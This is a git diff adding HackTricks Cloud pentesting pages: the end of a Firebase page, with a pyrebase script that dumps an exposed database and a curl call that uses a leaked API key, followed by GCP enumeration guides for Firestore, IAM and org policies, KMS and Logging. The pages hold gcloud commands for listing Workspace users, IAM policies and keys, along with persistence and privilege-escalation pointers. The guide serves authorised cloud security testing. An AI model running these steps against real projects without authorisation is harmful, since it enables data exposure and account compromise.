+#Taken from https://blog.assetnote.io/bug-bounty/2020/02/01/expanding-attack-surface-react-native/
+#Install pyrebase: pip install pyrebase4
+import pyrebase
+
+config = {
+  "apiKey": "FIREBASE_API_KEY",
+  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
+  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
+  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
+}
+
+firebase = pyrebase.initialize_app(config)
+
+db = firebase.database()
+
+print(db.get())
+```
+
+To test other actions on the database, such as writing to the database, refer to the Pyrebase4 documentation which can be found [here](https://github.com/nhorvath/Pyrebase4).
+
+### Access info with APPID and API Key <a href="#access-info-with-appid-and-api-key" id="access-info-with-appid-and-api-key"></a>
+
+If you decompile the iOS application and open the file `GoogleService-Info.plist` and you find the API Key and APP ID:
+
+* API KEY **AIzaSyAs1\[...]**
+* APP ID **1:612345678909:ios:c212345678909876**
+
+You may be able to access some interesting information
+
+**Request**
+
+`curl -v -X POST "https://firebaseremoteconfig.googleapis.com/v1/projects/612345678909/namespaces/firebase:fetch?key=AIzaSyAs1[...]" -H "Content-Type: application/json" --data '{"appId": "1:612345678909:ios:c212345678909876", "appInstanceId": "PROD"}'`
+
+## References <a href="#references" id="references"></a>
+
+* ​[https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)​
+* ​[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)​
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
new file mode 100644
index 0000000000..4eb8b93c3c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
@@ -0,0 +1,43 @@
+# GCP - Firestore Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
+
+Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
+
+```bash
+gcloud firestore indexes composite list
+gcloud firestore indexes composite describe <index>
+gcloud firestore indexes fields list
+gcloud firestore indexes fields describe <name>
+gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
new file mode 100644
index 0000000000..a66c584935
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
@@ -0,0 +1,258 @@
+# GCP - IAM, Principals & Org Policies Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Service Accounts
+
+For an intro about what is a service account check:
+
+{% content-ref url="../gcp-basic-information/" %}
+[gcp-basic-information](../gcp-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+A service account always belongs to a project:
+
+```bash
+gcloud iam service-accounts list --project <project>
+```
+
+## Users & Groups
+
+For an intro about how Users & Groups work in GCP check:
+
+{% content-ref url="../gcp-basic-information/" %}
+[gcp-basic-information](../gcp-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them.
+
+{% hint style="danger" %}
+Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**.
+
+However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs.
+{% endhint %}
+
+If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\
+Even if it says **`identity groups`**, it also returns **users without any groups**:
+
+{% code overflow="wrap" %}
+```bash
+# Enable admin
+gcloud services enable admin.googleapis.com
+gcloud services enable cloudidentity.googleapis.com
+
+# Using admin.googleapis.com
+## List all users
+gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID
+gcloud beta identity groups preview --customer <workspace-id>
+
+# Using cloudidentity.googleapis.com
+## List groups of a user (you can list at least the groups you belong to)
+gcloud identity groups memberships search-transitive-groups --member-email <email> --labels=cloudidentity.googleapis.com/groups.discussion_forum
+
+## List Group Members (you can list at least the groups you belong to)
+gcloud identity groups memberships list --group-email=<email>
+### Make it transitive
+gcloud identity groups memberships search-transitive-memberships --group-email=<email>
+
+## Get a graph (if you have enough permissions)
+gcloud identity groups memberships get-membership-graph --member-email=<email> --labels=cloudidentity.googleapis.com/groups.discussion_forum
+```
+{% endcode %}
+
+{% hint style="success" %}
+In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py).
+{% endhint %}
+
+Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions:
+
+<figure><img src="../../../.gitbook/assets/image (193).png" alt=""><figcaption></figcaption></figure>
+
+## IAM
+
+Check [**this for basic information about IAM**](../gcp-basic-information/#iam-roles).
+
+### Default Permissions
+
+From the [**docs**](https://cloud.google.com/resource-manager/docs/default-access-control): When an organization resource is created, all users in your domain are granted the **Billing Account Creator** and **Project Creator** roles by default. These default roles allow your users to start using Google Cloud immediately, but are not intended for use in regular operation of your organization resource.
+
+These **roles** grant the **permissions**:
+
+* `billing.accounts.create` and `resourcemanager.organizations.get`
+* `resourcemanager.organizations.get` and `resourcemanager.projects.create`
+
+Moreover, when a user creates a project, he is **granted owner of that project automatically** according to the [docs](https://cloud.google.com/resource-manager/docs/access-control-proj). Therefore, by default, a user will be able to create a project and run any service on it (miners? Workspace enumeration? ...)
+
+{% hint style="danger" %}
+The highest privilege in a GCP Organization is the **Organization Administrator** role.
+{% endhint %}
+
+### set-iam-policy vs add-iam-policy-binding
+
+In most of the services you will be able to change the permissions over a resource using the method **`add-iam-policy-binding`** or **`set-iam-policy`**. The main difference is that **`add-iam-policy-binding` adds a new role binding** to the existent IAM policy while **`set-iam-policy`** will **delete the previously** granted permissions and **set only the ones** indicated in the command.
+
+### Enumeration
+
+```bash
+# Roles
+## List roles
+gcloud iam roles list --project $PROJECT_ID # List only custom roles
+gcloud iam roles list --filter='etag:AA=='
+
+## Get perms and description of role
+gcloud iam roles describe roles/container.admin
+gcloud iam roles describe --project <proj-name> <role-name>
+
+# Policies
+gcloud organizations get-iam-policy <org_id>
+gcloud resource-manager folders get-iam-policy <folder-id>
+gcloud projects get-iam-policy <project-id>
+
+# MISC
+## Testable permissions in resource
+gcloud iam list-testable-permissions --filter "NOT apiDisabled: true" <resource>
+## Grantable roles to a resource
+gcloud iam list-grantable-roles <project URL>
+```
+
+### cloudasset IAM Enumeration
+
+There are different ways to check all the permissions of a user in different resources (such as organizations, folders, projects...) using this service.
+
+* The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource.
+
+```bash
+gcloud asset search-all-iam-policies #By default uses current configured project
+gcloud asset search-all-iam-policies --scope folders/1234567
+gcloud asset search-all-iam-policies --scope organizations/123456
+gcloud asset search-all-iam-policies --scope projects/project-id-123123
+```
+
+* The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource.
+
+```bash
+# Needs perm "cloudasset.assets.analyzeIamPolicy" over the asset
+gcloud asset analyze-iam-policy --organization=<org-id> \
+            --identity='user:email@hacktricks.xyz'
+gcloud asset analyze-iam-policy --folder=<folder-id> \
+            --identity='user:email@hacktricks.xyz'
+gcloud asset analyze-iam-policy --project=<project-name> \
+            --identity='user:email@hacktricks.xyz'
+```
+
+* The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included.
+
+```bash
+gcloud asset search-all-resources --scope projects/<proj-name>
+gcloud asset search-all-resources --scope folders/1234567
+gcloud asset search-all-resources --scope organizations/123456
+```
+
+* The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project
+
+```bash
+gcloud asset analyze-move --project=<proj-name> \
+          --destination-organization=609216679593
+```
+
+* I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals
+
+```bash
+# But, when running something like this
+gcloud asset query --project=<proj> --statement='SELECT * FROM compute_googleapis_com_Instance'
+# I get the error
+ERROR: (gcloud.asset.query) UNAUTHENTICATED: QueryAssets API is only supported for SCC premium customers. See https://cloud.google.com/security-command-center/pricing
+```
+
+### testIamPermissions enumeration
+
+{% hint style="danger" %}
+If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf\_my\_gcp\_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.**
+
+However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled.
+{% endhint %}
+
+### Privesc
+
+In the following page you can check how to **abuse IAM permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-iam-privesc.md" %}
+[gcp-iam-privesc.md](../gcp-privilege-escalation/gcp-iam-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Enum <a href="#service-account-impersonation" id="service-account-impersonation"></a>
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md" %}
+[gcp-iam-principals-and-org-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
+
+{% content-ref url="../gcp-post-exploitation/gcp-iam-post-exploitation.md" %}
+[gcp-iam-post-exploitation.md](../gcp-post-exploitation/gcp-iam-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+If you have high privileges you could:
+
+* Create new SAs (or users if in Workspace)
+* Give principals controlled by yourself more permissions
+* Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…)
+* …
+
+## Org Policies
+
+For an intro about what Org Policies are check:
+
+{% content-ref url="../gcp-basic-information/" %}
+[gcp-basic-information](../gcp-basic-information/)
+{% endcontent-ref %}
+
+The IAM policies indicate the permissions principals has over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are disabled**. This helps in order to improve the least privilege of each resource in the GCP environment.
+
+```bash
+gcloud resource-manager org-policies list --organization=ORGANIZATION_ID
+gcloud resource-manager org-policies list --folder=FOLDER_ID
+gcloud resource-manager org-policies list --project=PROJECT_ID
+```
+
+### Privesc
+
+In the following page you can check how to **abuse org policies permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-orgpolicy-privesc.md" %}
+[gcp-orgpolicy-privesc.md](../gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
new file mode 100644
index 0000000000..2e2c0be968
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md
@@ -0,0 +1,108 @@
+# GCP - KMS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+The [**Cloud Key Management Service**](https://cloud.google.com/kms/docs/) serves as a secure storage for **cryptographic keys**, which are essential for operations like **encrypting and decrypting sensitive data**. These keys are organized within key rings, allowing for structured management. Furthermore, access control can be meticulously configured, either at the individual key level or for the entire key ring, ensuring that permissions are precisely aligned with security requirements.
+
+KMS key rings are by **default created as global**, which means that the keys inside that key ring are accessible from any region. However, it's possible to create specific key rings in **specific regions**.
+
+### Key Protection Level
+
+* **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module (HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks.
+* **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases.
+* **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**.
+
+### Key Purposes
+
+* **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data.
+  * **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt)
+* **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret.
+  * **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
+* **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key.
+  * **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
+* **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications.
+  * **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify)
+
+### Rotation Period & Programmed for destruction period
+
+By **default**, each **90 days** but it can be **easily** and **completely customized.**
+
+The "Programmed for destruction" period is the **time since the user ask for deleting the key** and until the key is **deleted**. It cannot be changed after the key is created (default 1 day).
+
+### Primary Version
+
+Each KMS key can have several versions, one of them must be the **default** one, this will be the one used when a **version is not specified when interacting with the KMs key**.
+
+### Enumeration
+
+Having **permissions to list the keys** this is how you can access them:
+
+```bash
+# List the global keyrings available
+gcloud kms keyrings list --location global
+gcloud kms keyrings get-iam-policy <KEYRING>
+
+# List the keys inside a keyring
+gcloud kms keys list --keyring <KEYRING> --location <global/other_locations>
+gcloud kms keys get-iam-policy <KEY>
+
+# Encrypt a file using one of your keys
+gcloud kms encrypt --ciphertext-file=[INFILE] \
+    --plaintext-file=[OUTFILE] \
+    --key [KEY] \
+    --keyring [KEYRING] \
+    --location global
+
+# Decrypt a file using one of your keys
+gcloud kms decrypt --ciphertext-file=[INFILE] \
+    --plaintext-file=[OUTFILE] \
+    --key [KEY] \
+    --keyring [KEYRING] \
+    --location global
+```
+
+### Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-kms-privesc.md" %}
+[gcp-kms-privesc.md](../gcp-privilege-escalation/gcp-kms-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-kms-post-exploitation.md" %}
+[gcp-kms-post-exploitation.md](../gcp-post-exploitation/gcp-kms-post-exploitation.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
new file mode 100644
index 0000000000..102c59199f
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
@@ -0,0 +1,181 @@
+# GCP - Logging Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+This service allows users to store, search, analyze, monitor, and alert on **log data and events** from GCP.
+
+Cloud Logging is fully integrated with other GCP services, providing a centralized repository for logs from all your GCP resources. It **automatically collects logs from various GCP services** like App Engine, Compute Engine, and Cloud Functions. You can also use Cloud Logging for applications running on-premises or in other clouds by using the Cloud Logging agent or API.
+
+Key Features:
+
+* **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure.
+* **Real-time Log Management:** Stream logs in real time for immediate analysis and response.
+* **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly.
+* **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying.
+* **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting.
+
+### Logs flow
+
+<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption><p><a href="https://betterstack.com/community/guides/logging/gcp-logging/">https://betterstack.com/community/guides/logging/gcp-logging/</a></p></figcaption></figure>
+
+Basically the sinks and log based metrics will device where a log should be stored.
+
+### Configurations Supported by GCP Logging
+
+Cloud Logging is highly configurable to suit diverse operational needs:
+
+1. **Log Buckets (Logs storage in the web):** Define buckets in Cloud Logging to manage **log retention**, providing control over how long your log entries are retained.
+   * By default the buckets `_Default` and `_Required` are created (one is logging what the other isn’t).
+     * **\_Required** is:
+
+{% code overflow="wrap" %}
+````
+     ```bash
+     LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
+     ```
+     
+````
+{% endcode %}
+
+* **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified.
+* Note that Log Buckets are **not visible in Cloud Storage.**
+
+2. **Log Sinks (Log router in the web):** Create sinks to **export log entries** to various destinations such as Pub/Sub, BigQuery, or Cloud Storage based on a **filter**.
+   * By **default** sinks for the buckets `_Default` and `_Required` are created:
+   * ```bash
+     _Required  logging.googleapis.com/projects/<proj-name>/locations/global/buckets/_Required  LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
+     _Default   logging.googleapis.com/projects/<proj-name>/locations/global/buckets/_Default   NOT LOG_ID("cloudaudit.googleapis.com/activity") AND NOT LOG_ID("externalaudit.googleapis.com/activity") AND NOT LOG_ID("cloudaudit.googleapis.com/system_event") AND NOT LOG_ID("externalaudit.googleapis.com/system_event") AND NOT LOG_ID("cloudaudit.googleapis.com/access_transparency") AND NOT LOG_ID("externalaudit.googleapis.com/access_transparency")
+     ```
+   * **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise.
+3. **Log-based Metrics:** Configure **custom metrics** based on the content of logs, allowing for alerting and monitoring based on log data.
+4. **Log views:** Log views give advanced and **granular control over who has access** to the logs within your log buckets.
+   * Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable.
+
+It's possible to allow a principal **only to use a specific Log view** with an IAM policy like:
+
+{% code overflow="wrap" %}
+```json
+{
+  "bindings": [
+    {
+      "members": [
+        "user:username@gmail.com"
+      ],
+      "role": "roles/logging.viewAccessor",
+      "condition": {
+          "title": "Bucket reader condition example",
+          "description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.",
+          "expression":
+            "resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\""
+      }
+    }
+  ],
+  "etag": "BwWd_6eERR4=",
+  "version": 3
+}
+```
+{% endcode %}
+
+### Default Logs
